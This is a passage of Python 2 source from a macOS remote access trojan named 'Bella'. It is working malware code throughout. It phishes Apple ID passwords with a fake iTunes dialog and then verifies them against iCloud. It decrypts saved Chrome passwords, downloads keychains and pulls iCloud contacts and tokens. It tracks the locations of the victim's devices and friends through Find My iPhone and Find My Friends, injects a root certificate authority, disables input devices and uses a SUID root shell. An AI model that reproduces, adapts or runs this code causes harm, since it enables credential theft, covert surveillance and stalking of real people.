decrypted = subprocess.check_output("openssl enc -base64 -d -aes-128-cbc -k %s <<< '%s'" % (cryptKey, data), shell=True) #encrypt password
return base64.b64decode(decrypted)
def main_iCloud_helper():
error, errorMessage = False, False
dsid, token = "", ""
(username, password, usingToken) = iCloud_auth_process(False)
error = False
if password == False:
errorMessage = "%s%s" % (red_minus, username) #username will have the error message
error = True
else:
content = dsid_factory(username, password)
if content[0] == False:
errorMessage =content[1]
error = True
else:
try:
(dsid, token, usingToken) = content
except ValueError, e:
errorMessage = '\n'.join(content)
error = True
return (error, errorMessage, dsid, token)
def byte_convert(byte):
for count in ['B','K','M','G']:
if byte < 1024.0:
return ("%3.1f%s" % (byte, count)).replace('.0', '')
byte /= 1024.0
return "%3.1f%s" % (byte, 'TB')
def cur_GUI_user():
try:
return subprocess.check_output("stat -f '%Su' /dev/console", shell=True).replace("\n", "")
except:
return "No Current GUI"
def check_output(cmd):
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stderr = process.stderr.read()
stdout = process.stdout.read()
if process.wait() != 0:
print stderr
return (False, stderr, process.wait()) #failed, stderr, exit code
return (True, stdout, process.wait()) #completed successfully, stdout, exit code
def appleIDPhishHelp():
returnString = ""
for x in get_iTunes_accounts():
if x[0]:
returnString += "Local user: [%s] Apple ID: [%s]\n" % (x[2], x[1])
else:
pass
return pickle.dumps((returnString, cur_GUI_user()))
def appleIDPhish(username, GUIUser):
global bellaConnection
while True:
### CTRLC listener
bellaConnection.settimeout(0.0)
try: #SEE IF WE HAVE INCOMING MESSAGE MID LOOP
if recv_msg(bellaConnection) == 'sigint9kill':
sys.stdout.flush()
send_msg('terminated', True) #send back confirmation along with STDERR
done = True
bellaConnection.settimeout(None)
return 1
except socket.error as e: #no message, business as usual
pass
bellaConnection.settimeout(None)
check = applepwRead()
if isinstance(check, str): #we have file...
send_msg("%sApple password already found [%s] %s\n" % (blue_star, check, blue_star), False)
break
osa = "launchctl asuser " + str(bella_UID) + " osascript -e 'tell application \"iTunes\"' -e \"pause\" -e \"end tell\"; osascript -e 'tell app \"iTunes\" to activate' -e 'tell app \"iTunes\" to activate' -e 'tell app \"iTunes\" to display dialog \"Error connecting to iTunes. Please verify your password for " + username + " \" default answer \"\" with icon 1 with hidden answer with title \"iTunes Connection\"'"
#pauses music, then prompts user
out = check_output(osa)
if not out[0]:
#user has attempted to cancel
send_msg("[-] User has attempted to cancel. Trying again.\n", False)
continue
else:
out = out[1]
passw = out.split()[3]
passw = passw.split(':')[1]
send_msg("%sUser has attempted to use password: %s\n" % (blue_star, passw), False)
try:
request = urllib2.Request("https://setup.icloud.com/setup/get_account_settings")
base64string = base64.encodestring('%s:%s' % (username, passw)).replace('\n', '')
request.add_header("Authorization", "Basic %s" % base64string)
result = urllib2.urlopen(request)
out2 = result.read()
except Exception, e:
if str(e) == "HTTP Error 401: Unauthorized":
out2 = "fail?"
elif str(e) == "HTTP Error 409: Conflict":
out2 = "2sV"
else:
out2 = "otherError!"
if out2 == "fail?":
send_msg(red_minus + "Bad combo: [%s:%s]\n" % (username, passw), False)
continue
elif out2 == "2sV":
send_msg("%sVerified! [2FV Enabled] Account -> [%s:%s]%s\n" % (greenPlus, username, passw, endANSI), False)
updateDB(encrypt("%s:%s" % (username, passw)), 'applePass')
os.system("osascript -e 'tell application \"iTunes\"' -e \"play\" -e \"end tell\";")
break
elif out2 == "otherError!":
send_msg("%sMysterious error with [%s:%s]\n" % (red_minus, username, passw), False)
break
else:
send_msg("%sVerified! Account -> %s[%s:%s]%s\n" % (greenPlus, bold, username, passw, endANSI), False)
updateDB(encrypt("%s:%s" % (username, passw)), 'applePass')
os.system("osascript -e 'tell application \"iTunes\"' -e \"play\" -e \"end tell\";")
break
send_msg('', True)
return 1
def is_there_SUID_shell():
if os.getuid() == 0:
return True
if os.path.isfile('/usr/local/roots'):
return True
if local_pw_read():
#send_msg("%sLocal PW present.\n" % greenPlus, False)
binarymake = make_SUID_root_binary(local_pw_read(), None)
#send_msg(binarymake[1], False)
if binarymake[0]: #we have successfully created a temp root shell
return True
return False
return False
def remove_SUID_shell():
if os.path.isfile('/usr/local/roots'):
try:
os.system('/usr/local/roots rm /usr/local/roots > /dev/null')
#send_msg('%sRemoved temporary root shell.\n' % yellow_star, False) #%
except Exception as e:
pass
#send_msg('%sError removing temporary root shell @ /usr/local/roots. You should delete this manually.\n' % red_minus , False)
return
def do_root(command):
if os.getuid() == 0:
output = subprocess.Popen("%s" % command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out = output.stdout.read()
err = output.stderr.read()
if output.wait() != 0:
return (False, '%sWe are root, but there was an error.\n%s%s' % (blue_star, yellow_star, err))
return (True, "%s\n" % out)
else:
if not is_there_SUID_shell():
return (False, '%sThere is no root shell to perform this command. See [rooter] manual entry.\n' % red_minus)
output = subprocess.Popen("/usr/local/roots \"%s\"" % (command), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out = output.stdout.read()
err = output.stderr.read()
if err != '':
return (False, '%sThere is a root shell to perform this command, but there was an error.\n%s%s' % (blue_star, yellow_star, err))
return (True, "%s\n" % out)
def cert_inject(cert):
cPath = tempfile.mkdtemp()
with open('%scert.crt' % cPath, 'w') as content:
content.write(cert)
temp_file_list.append(cPath)
(success, msg) = do_root("security add-trusted-cert -d -r trustRoot -k /System/Library/Keychains/SystemRootCertificates.keychain %scert.crt" % cPath)
if not success:
return "%sError injecting root CA into System Keychain:\n%s" % (red_minus, msg)
payload_cleaner()
return "%sCertificate Authority injected into System Keychain!\n" % yellow_star
def cert_remove(shahash):
(success, msg) = do_root("security delete-certificate -Z %s /System/Library/Keychains/SystemRootCertificates.keychain" % shahash)
if not success:
return "%sError removing root CA from System Keychain:\n%s" % (red_minus, msg)
return "%sCertificate Authority removed from System Keychain!\n" % yellow_star
def check_current_users():
output = check_output("w -h | sort -u -t' ' -k1,1 | awk {'print $1'}")
if not output[0]:
return "Error finding current users.\n"
return output[1]
def check_pid(pid):
try:
os.kill(pid, 0)
except OSError:
return False
else:
return True
def chrome_decrypt(encrypted_value, iv, key): #AES decryption using the PBKDF2 key and 16x ' ' IV, via openSSL (installed on OSX natively)
hexKey = binascii.hexlify(key)
hexEncPassword = base64.b64encode(encrypted_value[3:])
decrypted = check_output("openssl enc -base64 -d -aes-128-cbc -iv '%s' -K %s <<< %s 2>/dev/null" % (iv, hexKey, hexEncPassword))
if not decrypted[0]:
decrypted = "ERROR retrieving password.\n"
return decrypted[1] #otherwise we got it
def chrome_dump(safe_storage_key, loginData):
returnable = "%s%sPasswords for [%s]%s:\n" % (yellow_star, bold + underline, loginData.split("/")[-2], endANSI)
empty = True
for i, x in enumerate(chrome_process(safe_storage_key, "%s" % loginData)):
returnable += "%s[%s]%s %s%s%s\n\t%sUser%s: %s\n\t%sPass%s: %s\n" % ("\033[32m", (i + 1), "\033[0m", "\033[1m", x[0], "\033[0m", "\033[32m", "\033[0m", x[1], "\033[32m", "\033[0m", x[2])
empty = False
if not empty:
return returnable
else:
return "%sFound no Chrome Passwords for [%s].\n" % (blue_star, loginData.split("/")[-2])
def chrome_process(safe_storage_key, loginData):
iv = ''.join(('20',) * 16) #salt, iterations, iv, size - https://cs.chromium.org/chromium/src/components/os_crypt/os_crypt_mac.mm
key = hashlib.pbkdf2_hmac('sha1', safe_storage_key, b'saltysalt', 1003)[:16]
copypath = tempfile.mkdtemp() #work around for locking DB
dbcopy = protected_file_reader(loginData) #again, shouldnt matter because we only can decrypt DBs with keys
with open('%s/chrome' % copypath, 'wb') as content:
content.write(dbcopy) #if chrome is open, the DB will be locked, so get around by making a temp copy
database = sqlite3.connect('%s/chrome' % copypath)
sql = 'select username_value, password_value, origin_url from logins'
decryptedList = []
with database:
for user, encryptedPass, url in database.execute(sql):
if user == "" or (encryptedPass[:3] != b'v10'): #user will be empty if they have selected "never" store password
continue
else:
urlUserPassDecrypted = (url.encode('ascii', 'ignore'), user.encode('ascii', 'ignore'), chrome_decrypt(encryptedPass, iv, key=key).encode('ascii', 'ignore'))
decryptedList.append(urlUserPassDecrypted)
shutil.rmtree(copypath)
return decryptedList
def chrome_safe_storage():
global bellaConnection
retString = ""
check = chromeSSRead()
if isinstance(check, str):
send_msg("%sPreviously generated Google Chrome Safe Storage key.\n%s%s\n" % (blue_star, blue_star, check), True)
return
while True:
### CTRLC listener
bellaConnection.settimeout(0.0)
try: #SEE IF WE HAVE INCOMING MESSAGE MID LOOP
if recv_msg(bellaConnection) == 'sigint9kill':
sys.stdout.flush()
send_msg('terminated', True) #send back confirmation along with STDERR
done = True
bellaConnection.settimeout(None)
return 1
except socket.error as e: #no message, business as usual
pass
bellaConnection.settimeout(None)
kchain = getKeychains()
send_msg("%sUsing [%s] as keychain.\n" % (yellow_star, kchain), False)
encryptionKey = check_output("launchctl asuser %s security find-generic-password -wa 'Chrome' '%s'" % (bella_UID, kchain)) #get rid of \n
if not encryptionKey[0]:
if 51 == encryptionKey[2]:
send_msg("%sUser clicked deny.\n" % red_minus, False)
continue
elif 44 == encryptionKey[2]:
send_msg("%sNo Chrome Safe Storage Key Found!\n" % red_minus, True)
return
else:
send_msg("Strange error [%s]\n" % encryptionKey[1], True)
return
updateDB(encrypt(encryptionKey[1].replace('\n', '')), 'chromeSS') #got it
send_msg("%sChrome Key: [%s]\n" % (blue_star, encryptionKey[1].replace('\n', '')), True)
return
def disable_keyboard_mouse(device):
paths = {"keyboard": "/System/Library/Extensions/AppleUSBTopCase.kext/Contents/PlugIns/AppleUSBTCKeyboard.kext/", "mouse": "/System/Library/Extensions/AppleUSBMultitouch.kext/"}
(success, msg) = do_root("kextunload %s" % paths[device])
if not success:
return "%sError disabling %s.\n%s" % (red_minus, paths[device], msg)
return "%s%s successfully disabled!\n" % (greenPlus, device)
def dsid_factory(uname, passwd):
resp = None
req = urllib2.Request("https://setup.icloud.com/setup/authenticate/%s" % uname)
req.add_header('Authorization', 'Basic %s' % base64.b64encode("%s:%s" % (uname, passwd)))
req.add_header('Content-Type', 'application/json')
try:
resp = urllib2.urlopen(req)
except urllib2.HTTPError as e:
if e.code != 200:
if e.code == 401:
return (False, "HTTP Error 401: Unauthorized. Are you sure the credentials are correct?\n", False)
elif e.code == 409:
tokenLocal = tokenRead()
if tokenLocal != False: #if we have token use it ... bc 2SV wont work with regular uname/passw
dsid = tokenLocal.split("\n")[1].split(":")[0]
tokz = tokenLocal.split("\n")[1].split(":")[1]
return (dsid, tokz, True)
else:
return (False, "HTTP Error 409: Conflict. 2 Factor Authentication appears to be enabled. You cannot use this function unless you get your MMeAuthToken manually (generated either on your PC/Mac or on your iOS device).\n", False)
elif e.code == 404:
return (False, "HTTP Error 404: URL not found. Did you enter a username?\n", False)
else:
return (False, "HTTP Error %s." % e.code, False)
else:
return e
content = resp.read()
uname = plistlib.readPlistFromString(content)["appleAccountInfo"]["dsPrsID"] #stitch our own auth DSID
passwd = plistlib.readPlistFromString(content)["tokens"]["mmeAuthToken"] #stitch with token
return (uname, passwd, False) #third value is "usingToken?"
def enable_keyboard_mouse(device):
paths = {"keyboard": "/System/Library/Extensions/AppleUSBTopCase.kext/Contents/PlugIns/AppleUSBTCKeyboard.kext/", "mouse": "/System/Library/Extensions/AppleUSBMultitouch.kext/"}
(success, msg) = do_root("kextload %s" % paths[device])
if not success:
return "%sError enabling %s.\n%s" % (red_minus, paths[device], msg)
return "%s%s successfully enabled!\n" % (greenPlus, device)
def enumerate_chrome_profiles():
return globber("/Users/*/Library/Application Support/Google/Chrome/*/Login Data")
def FMIP(username, password):
i = 0
try: #if we are given a FMIP token, change auth Type
int(username)
authType = "Forever"
except ValueError: #else apple id use useridguest
authType = "UserIDGuest"
while True:
i +=1
url = 'https://fmipmobile.icloud.com/fmipservice/device/%s/initClient' % username
headers = {
'X-Apple-Realm-Support': '1.0',
'Authorization': 'Basic %s' % base64.b64encode("%s:%s" % (username, password)),
'X-Apple-Find-API-Ver': '3.0',
'X-Apple-AuthScheme': '%s' % authType,
'User-Agent': 'FindMyiPhone/500 CFNetwork/758.4.3 Darwin/15.5.0',
}
request = urllib2.Request(url, None, headers)
request.get_method = lambda: "POST"
try:
response = urllib2.urlopen(request)
z = json.loads(response.read())
except urllib2.HTTPError as e:
if e.code == 401:
return "Authorization Error 401. Try credentials again."
if e.code == 403:
pass #can ignore
raise e
if i == 2: #loop twice / send request twice
break
send_msg("Sent \033[92mlocation\033[0m beacon to \033[91m[%s]\033[0m devices\n" % len(z["content"]), False)
send_msg("Awaiting response from iCloud...\n", False)
#okay, FMD request has been sent, now lets wait a bit for iCloud to get results, and then do again, and then break
time.sleep(5)
send_msg("\033[94m(%s %s | %s)\033[0m -> \033[92mFound %s Devices\033[0m\n-------\n" % (z["userInfo"]["firstName"], z["userInfo"]["lastName"], username, len(z["content"])), False)
i = 1
for y in z["content"]:
try:
send_msg("Device [%s]\n" % i, False)
i += 1
send_msg("Model: %s\n" % y["deviceDisplayName"], False)
send_msg("Name: %s\n" % y["name"], False)
timeStamp = y["location"]["timeStamp"] / 1000
timeNow = time.time()
timeDelta = timeNow - timeStamp #time difference in seconds
minutes, seconds = divmod(timeDelta, 60) #great function, saves annoying maths
hours, minutes = divmod(minutes, 60)
timeStamp = datetime.datetime.fromtimestamp(timeStamp).strftime("%A, %B %d at %I:%M:%S")
if hours > 0:
timeStamp = "%s (%sh %sm %ss ago)" % (timeStamp, str(hours).split(".")[0], str(minutes).split(".")[0], str(seconds).split(".")[0])
else:
timeStamp = "%s (%sm %ss ago)" % (timeStamp, str(minutes).split(".")[0], str(seconds).split(".")[0])
send_msg("Latitude, Longitude: <%s;%s>\n" % (y["location"]["latitude"], y["location"]["longitude"]), False)
send_msg("Battery: %s & %s\n" % (y["batteryLevel"], y["batteryStatus"]), False)
send_msg("\033[92mLocated at: %s\033[0m\n" % timeStamp, False)
send_msg("-------\n", False)
except TypeError,e :
send_msg("\033[92mCould not get GPS lock!\033[0m\n", False)
send_msg('', True)
return 0
def get_card_links(dsid, token):
url = 'https://p04-contacts.icloud.com/%s/carddavhome/card' % dsid
headers = {
'Depth': '1',
'Authorization': 'X-MobileMe-AuthToken %s' % base64.b64encode("%s:%s" % (dsid, token)),
'Content-Type': 'text/xml',
}
data = """<?xml version="1.0" encoding="UTF-8"?>
<A:propfind xmlns:A="DAV:">
<A:prop>
<A:getetag/>
</A:prop>
</A:propfind>
"""
request = urllib2.Request(url, data, headers)
request.get_method = lambda: 'PROPFIND' #replace the get_method fxn from its default to PROPFIND to allow for successfull cardDav pull
response = urllib2.urlopen(request)
zebra = ET.fromstring(response.read())
returnedData = """<?xml version="1.0" encoding="UTF-8"?>
<F:addressbook-multiget xmlns:F="urn:ietf:params:xml:ns:carddav">
<A:prop xmlns:A="DAV:">
<A:getetag/>
<F:address-data/>
</A:prop>\n"""
for response in zebra:
for link in response:
href = response.find('{DAV:}href').text #get each link in the tree
returnedData += "<A:href xmlns:A=\"DAV:\">%s</A:href>\n" % href
return "%s</F:addressbook-multiget>" % str(returnedData)
def get_card_data(dsid, token):
url = 'https://p04-contacts.icloud.com/%s/carddavhome/card' % dsid
headers = {
'Content-Type': 'text/xml',
'Authorization': 'X-MobileMe-AuthToken %s' % base64.b64encode("%s:%s" % (dsid, token)),
}
data = get_card_links(dsid, token)
request = urllib2.Request(url, data, headers)
request.get_method = lambda: 'REPORT' #replace the get_method fxn from its default to REPORT to allow for successfull cardDav pull
response = urllib2.urlopen(request)
zebra = ET.fromstring(response.read())
i = 0
contactList, phoneList, cards = [], [], []
for response in zebra:
tel, contact, email = [], [], []
name = ""
vcard = response.find('{DAV:}propstat').find('{DAV:}prop').find('{urn:ietf:params:xml:ns:carddav}address-data').text
if vcard:
for y in vcard.splitlines():
if y.startswith("FN:"):
name = y[3:]
if y.startswith("TEL;"):
tel.append((y.split("type")[-1].split(":")[-1].replace("(", "").replace(")", "").replace(" ", "").replace("-", "").encode("ascii", "ignore")))
if y.startswith("EMAIL;") or y.startswith("item1.EMAIL;"):
email.append(y.split(":")[-1])
cards.append(([name], tel, email))
return sorted(cards)
def get_iTunes_accounts():
iClouds = globber("/Users/%s/Library/Accounts/Accounts3.sqlite" % get_bella_user()) #we are only interested in the current GUI user
returnList = []
for x in iClouds:
database = sqlite3.connect(x)
try:
accounts = list(database.execute("SELECT ZUSERNAME FROM ZACCOUNT WHERE ZACCOUNTDESCRIPTION='iCloud'"))
username = accounts[0][0] #gets just the first account, no multiuser support yet
returnList.append((True, username, x.split("/")[2]))
except Exception, e:
if str(e) == "list index out of range":
returnList.append((False, "No iCloud Accounts present\n", x.split("/")[2]))
else:
returnList.append((False, "%s\n" % str(e), x.split("/")[2]))
return returnList
def get_model():
model = readDB('model')
if not model:
return model
return model
def heard_it_from_a_friend_who(uDsid, mmeAuthToken, cardData):
mmeFMFAppToken = tokenFactory(base64.b64encode("%s:%s" % (uDsid, mmeAuthToken)))[0][2]
url = 'https://p04-fmfmobile.icloud.com/fmipservice/friends/%s/refreshClient' % uDsid
headers = {
'Authorization': 'Basic %s' % base64.b64encode("%s:%s" % (uDsid, mmeFMFAppToken)),#FMF APP TOKEN
'Content-Type': 'application/json; charset=utf-8',
}
data = {
"clientContext": {
"appVersion": "5.0" #critical for getting appropriate config / time apparently.
}
}
jsonData = json.dumps(data)
request = urllib2.Request(url, jsonData, headers)
i = 0
while 1:
try:
response = urllib2.urlopen(request)
break
except: #for some reason this exception needs to be caught a bunch of times before the request is made.
i +=1
continue
x = json.loads(response.read())
dsidList = []
phoneList = [] #need to find how to get corresponding name from CalDav
for y in x["following"]: #we need to get contact information.
for z, v in y.items():
#do some cleanup
if z == "invitationAcceptedHandles":
v = v[0] #v is a list of contact information, we will grab just the first identifier
phoneList.append(v)
if z == "id":
v = v.replace("~", "=")
v = base64.b64decode(v)
dsidList.append(v)
zippedList = zip(dsidList, phoneList)
retString = ""
i = 0
for y in x["locations"]:#[0]["location"]["address"]:
streetAddress, country, state, town, timeStamp = " " *5
dsid = y["id"].replace("~", "=")
dsid = base64.b64decode(dsid) #decode the base64 id, and find its corresponding one in the zippedList.
for g in zippedList:
if g[0] == dsid:
phoneNumber = g[1] #we should get this for every person. no errors if no phone number found.
for x in cardData:
for nums in x[1]:
if phoneNumber.replace("+1", "") in nums:
phoneNumber += " (%s)" % x[0][0]
for emails in x[2]:
if phoneNumber in emails:
phoneNumber += " (%s)" % x[0][0]
try:
timeStamp = y["location"]["timestamp"] / 1000
timeNow = time.time()
timeDelta = timeNow - timeStamp #time difference in seconds
minutes, seconds = divmod(timeDelta, 60) #great function, saves annoying maths
hours, minutes = divmod(minutes, 60)
timeStamp = datetime.datetime.fromtimestamp(timeStamp).strftime("%A, %B %d at %I:%M:%S")
timeStamp = "%s (%sm %ss ago)" % (timeStamp, str(minutes).split(".")[0], str(seconds).split(".")[0]) #split at decimal
except TypeError:
timeStamp = "Could not get last location time."
if not y["location"]: #once satisfied, all is good, return fxn will end
continue #go back to top of loop and re-run query
for z, v in y["location"]["address"].items(): #loop through address info
#counter of threes for pretty print...
if type(v) is list:
continue
if z == "streetAddress":
streetAddress = v
if z == "countryCode":
country = v
if z == "stateCode":
state = v
if z == "locality":
town = v
if streetAddress != " ": #in the event that we cant get a street address, dont print it to the final thing
retString += "%s\n%s\n%s, %s, %s\n%s\n%s\n" % ("\033[34m" + phoneNumber, "\033[92m" + streetAddress, town, state, country, "\033[0m" + timeStamp,"-----")
else:
retString += "%s\n%s, %s, %s\n%s\n%s\n" % ("\033[34m" + phoneNumber, "\033[92m" + town, state, country, "\033[0m" + timeStamp,"-----")
i += 1
localToken = tokenRead()
if tokenRead() != False:
uDsid = tokenRead().split("\n")[0]
return retString + "\033[91mFound \033[93m[%s]\033[91m friends for %s!\033[0m\n" % (i, uDsid)
def iCloud_auth_process(tokenOverride):
#this function will return a username and password combination, or a DSID and token combination, along with a code for which one is being used.
returnString = ""
token = ""
usingToken = False
localToken = tokenRead()
applePresent = applepwRead()
if isinstance(applePresent, str) and tokenOverride == False:
(username, password) = applepwRead().split(":") #just take the first account if there are multiple
usingToken = False
elif localToken != False: #means we have a token file.
try:
(username, password) = localToken.split("\n")[1].split(":")
usingToken = True
except Exception, e:
return (e, False, usingToken)
else: #means we have neither a token file, or apple creds
return ("No token found, no apple credentials found.\n", False, usingToken)
return (username, password, usingToken)
def iCloud_storage_helper(dsid, authToken):
authCode = base64.b64encode("%s:%s" % (dsid, authToken))
tokens = tokenFactory(authCode)
send_msg('Getting iCloud information.\n', False)
try:
req = urllib2.Request("https://p04-quota.icloud.com/quotaservice/external/mac/%s/storageUsageDetails" % dsid) #this will have all tokens
req.add_header('Authorization', 'Basic %s' % authCode)
req.add_header('Content-Type', 'application/json')
resp = urllib2.urlopen(req)
storageData = resp.read()
except Exception as e:
send_msg("Slight error [%s]" % e, False)
resp_dict = json.loads(storageData)
for x in tokens[1]: #tokens[1] is the account information of the user
send_msg("%s\n\n" % x, False)
try:
for x in resp_dict["photo"]:
if x["libraryEnabled"]:
send_msg(underline + "iCloud Photo Library: Enabled" + endANSI + "\n", False)
send_msg("\tPhoto Count: %s\n" % x["photoCount"], False)
send_msg("\tVideo Count: %s\n" % x["videoCount"], False)
send_msg("\tiCloud Photo Library Size: %s.%s GB\n" % (str(x["storageUsedInBytes"])[0], str(x["storageUsedInBytes"])[1:4]), False)
else:
send_msg(underline + "iCloud Photo Library: Disabled" + endANSI + "\n", False)
except:
send_msg("iCloud Photo Library: Disabled\n", False)
i = 0
try:
z = resp_dict["backups"]
if len(z) == 0:
send_msg("\n%sNo iCloud Backups found%s\n\n" % (underline, endANSI), False)
else:
send_msg("%siCloud Backups:%s\n" % (underline, endANSI), False)
for x in resp_dict["backups"]:
i += 1
#make a little dictionary to get the pretty name of the device.
productTypes = {'iPhone3,1': 'iPhone 4 (GSM)', 'iPhone3,2': 'iPhone 4 (CDMA)', 'iPhone4,1': 'iPhone 4s', 'iPhone5,1': 'iPhone 5 (GSM)', 'iPhone5,2': 'iPhone 5 (CDMA)', 'iPhone5,3': 'iPhone 5c', 'iPhone6,2': 'iPhone 5s (UK)', 'iPhone7,1': 'iPhone 6 Plus', 'iPhone8,1': 'iPhone 6s', 'iPhone8,2': 'iPhone 6s Plus', 'iPhone6,1': 'iPhone 5s', 'iPhone7,2': 'iPhone 6'}
try:
iPhone_type = productTypes[x["productType"]]
except:
iPhone_type = x["productType"]
send_msg("\t[%s] %s %s | Size is %s.%s GB | Model: %s\n" % (i, x["name"], x["lastModifiedLocalized"], str(x["storageUsedInBytes"])[0], str(x["storageUsedInBytes"])[1:4], iPhone_type), False)
except Exception, e:
send_msg("Error checking backups.\n%s\n" % str(e), False)
if len(tokens[0]) > 1:
send_msg("%sTokens!%s\n" % (underline, endANSI), False)
send_msg("\tMMeAuth: %s%s%s\n" % (blue, tokens[0][0], endANSI), False)
send_msg("\tCloud Kit: %s%s%s\n" % (red, tokens[0][1], endANSI), False)
send_msg("\tFMF App: %s%s%s\n" % (yellow, tokens[0][2], endANSI), False)
send_msg("\tFMiP: %s%s%s\n" % (green, tokens[0][3], endANSI), False)
send_msg("\tFMF: %s%s%s\n" % (violet, tokens[0][4], endANSI), False)
send_msg('', True)
return
def insomnia_load():
if "book" in get_model().lower():
if is_there_SUID_shell():
gen = payload_generator(readDB('insomnia', True)) #will return b64 zip
payload_tmp_path = '/'.join(gen.split('/')[:-1])
do_root('unzip %s -d %s' % (gen, payload_tmp_path))
(success, msg) = do_root("chown -R 0:0 %s/Insomnia.kext/" % payload_tmp_path)
if not success:
return "%sError changing kext ownership to root.\n%s" % (red_minus, msg)
(success, msg) = do_root("kextload %s/Insomnia.kext/" % payload_tmp_path)
if not success:
return "%sError loading kext.\n%s" % (red_minus, msg)
return "%sInsomnia successfully loaded.\n" % greenPlus
return "%sYou need a root shell to load Insomnia.\n" % red_minus
else:
return "%sInsomnia does not work on non-MacBooks.\n" % blue_star
def insomnia_unload():
if "book" in get_model() or "Book" in get_model():
if is_there_SUID_shell():
(success, msg) = do_root("kextunload -b net.semaja2.kext.insomnia")
if not success:
return "%sError unloading kext.\n%s" % (red_minus, msg)
return "%sInsomnia successfully unloaded.\n" % greenPlus
return "%sYou need a root shell to load Insomnia.\n" % red_minus
else:
return "%sInsomnia does not work on non-MacBooks.\n" % blue_star
def resetUIDandName(): #if we are root we want to update the variable accordingly
global bella_user, helper_location, bella_UID
if os.getuid() == 0:
bella_user = cur_GUI_user()
bella_UID = pwd.getpwnam(bella_user).pw_uid
helper_location = '/'.join(os.path.abspath(__file__).split('/')[:-1]) + '/'
return
def initialize_socket():
basicInfo = ''
resetUIDandName()
os.chdir(os.path.expanduser('~'))
if not check_if_payloads():
print 'requesting payloads'
return 'payload_request_SBJ129' #request our payloads
if readDB('lastLogin') == False: #if it hasnt been set
updateDB('Never', 'lastLogin')
if not isinstance(get_model(), str): #if no model, put it in
output = check_output("sysctl hw.model")
if output[0]:
modelRaw = output[1].split(":")[1].replace("\n", "").replace(" ", "")
output = check_output("/usr/libexec/PlistBuddy -c 'Print :\"%s\"' /System/Library/PrivateFrameworks/ServerInformation.framework/Versions/A/Resources/English.lproj/SIMachineAttributes.plist | grep marketingModel" % modelRaw)
if not output[0]:
model = 'Macintosh'
else:
model = output[1].split("=")[1][1:] #get everything after equal sign, and then remove first space.
updateDB(model, 'model')
if os.getuid() == 0:
basicInfo = 'ROOTED\n'
output = check_output('scutil --get LocalHostName; echo %s; pwd; echo %s' % (get_bella_user(), readDB('lastLogin')))
if output[0]:
basicInfo += output[1]
else:
return check_output("echo 'bareNeccesities'; scutil --get LocalHostName; whoami; pwd")[1]
output = check_output('ps -p %s -o etime=' % bellaPID)
if output[0]:
basicInfo += output[1]
else:
return check_output("echo 'bareNeccesities'; scutil --get LocalHostName; whoami; pwd")[1]
updateDB(time.strftime("%a, %b %e %Y at %I:%M:%S %p"), 'lastLogin')
return basicInfo
def iTunes_backup_looker():
backupPath = globber("/Users/*/Library/Application Support/MobileSync/Backup/*/Info.plist")
if len(backupPath) > 0:
backups = True
returnable = "%sLooking for backups! %s\n" % (blue_star, blue_star)
for z, y in enumerate(backupPath):
returnable += "\n----- Device " + str(z + 1) + " -----\n\n"
returnable += "Product Name: %s\n" % os.popen("/usr/libexec/PlistBuddy -c 'Print :\"Product Name\"' '%s'" % y).read().replace("\n", "")
returnable += "Product Version: %s\n" % os.popen("/usr/libexec/PlistBuddy -c 'Print :\"Product Version\"' '%s'" % y).read().replace("\n", "")
returnable += "Last Backup Date: %s\n" % os.popen("/usr/libexec/PlistBuddy -c 'Print :\"Last Backup Date\"' '%s'" % y).read().replace("\n", "")
returnable += "Device Name: %s\n" % os.popen("/usr/libexec/PlistBuddy -c 'Print :\"Device Name\"' '%s'" % y).read().replace("\n", "")
returnable += "Phone Number: %s\n" % os.popen("/usr/libexec/PlistBuddy -c 'Print :\"Phone Number\"' '%s'" % y).read().replace("\n", "")
returnable += "Serial Number: %s\n" % os.popen("/usr/libexec/PlistBuddy -c 'Print :\"Serial Number\"' '%s'" % y).read().replace("\n", "")
returnable += "IMEI/MEID: %s\n" % os.popen("/usr/libexec/PlistBuddy -c 'Print :\"IMEI\"' '%s'" % y).read().replace("\n", "")
returnable += "UDID: %s\n" % os.popen("/usr/libexec/PlistBuddy -c 'Print :\"Target Identifier\"' '%s'" % y).read().replace("\n", "")
returnable += "iTunes Version: %s\n" % os.popen("/usr/libexec/PlistBuddy -c 'Print :\"iTunes Version\"' '%s'" % y).read().replace("\n", "")
#iTunesBackupString += "Installed Apps: %s\n" % os.popen("/usr/libexec/PlistBuddy -c 'Print :\"Installed Applications\"' '%s'" % y).read().replace("\n", "")
else:
backups = False
returnable = "%sNo local backups found %s\n" % (blue_star, blue_star)
return (returnable, backups, len(backupPath))
def kill_pid(pid):
try:
os.kill(pid, 9)
return True
except OSError, e:
return False
def keychain_download():
try:
returnVal = []
for x in globber("/Users/*/Library/Keychains/login.keychain*"):
#with open(x, 'rb') as content:
content = protected_file_reader(x) #will return us permission acceptable file info
user = x.split("/")[2]
returnVal.append(pickle.dumps(['%s_login.keychain' % user, content]))
for iCloudKey in globber("/Users/*/Library/Keychains/*/keychain-2.db"):
iCloudZip = StringIO.StringIO()
joiner = '/'.join(iCloudKey.split("/")[:-1])
for files in protected_file_lister(joiner):
with zipfile.ZipFile(iCloudZip, mode='a', compression=zipfile.ZIP_DEFLATED) as zipped:
subFile = os.path.join(joiner, files)
content = protected_file_reader(subFile)
zipped.writestr(files, content)
with zipfile.ZipFile(iCloudZip, mode='a', compression=zipfile.ZIP_DEFLATED) as zipped:
zipped.writestr(joiner.split("/")[-1], 'Keychain UUID')
returnVal.append(pickle.dumps(["%s_iCloudKeychain.zip" % iCloudKey.split("/")[2], iCloudZip.getvalue()]))
if is_there_SUID_shell():
keys = protected_file_reader("/Library/Keychains/System.keychain")
returnVal.append(pickle.dumps(["System.keychain", keys]))
return 'keychain_download' + pickle.dumps(returnVal)
except Exception, e:
return (red_minus + "Error reading keychains.\n%s\n") % str(e)
def manual():
value = "\n%sChat History%s\nDownload the user's macOS iMessage database.\nUsage: %schat_history%s\nRequirements: None\n" % (underline + bold + light_blue, endANSI, bold, endANSI)
value += "\n%sCheck Backups%s\nEnumerate the user's local iOS backups.\nUsage: %scheck_backups%s\nRequirements: None\n" % (underline + bold + light_blue, endANSI, bold, endANSI)
value += "\n%sChrome Dump%s\nDecrypt user passwords stored in Google Chrome profiles.\nUsage: %schrome_dump%s\nRequirements: Chrome SS Key [see chrome_safe_storage]\n" % (underline + bold + green, endANSI, bold, endANSI)
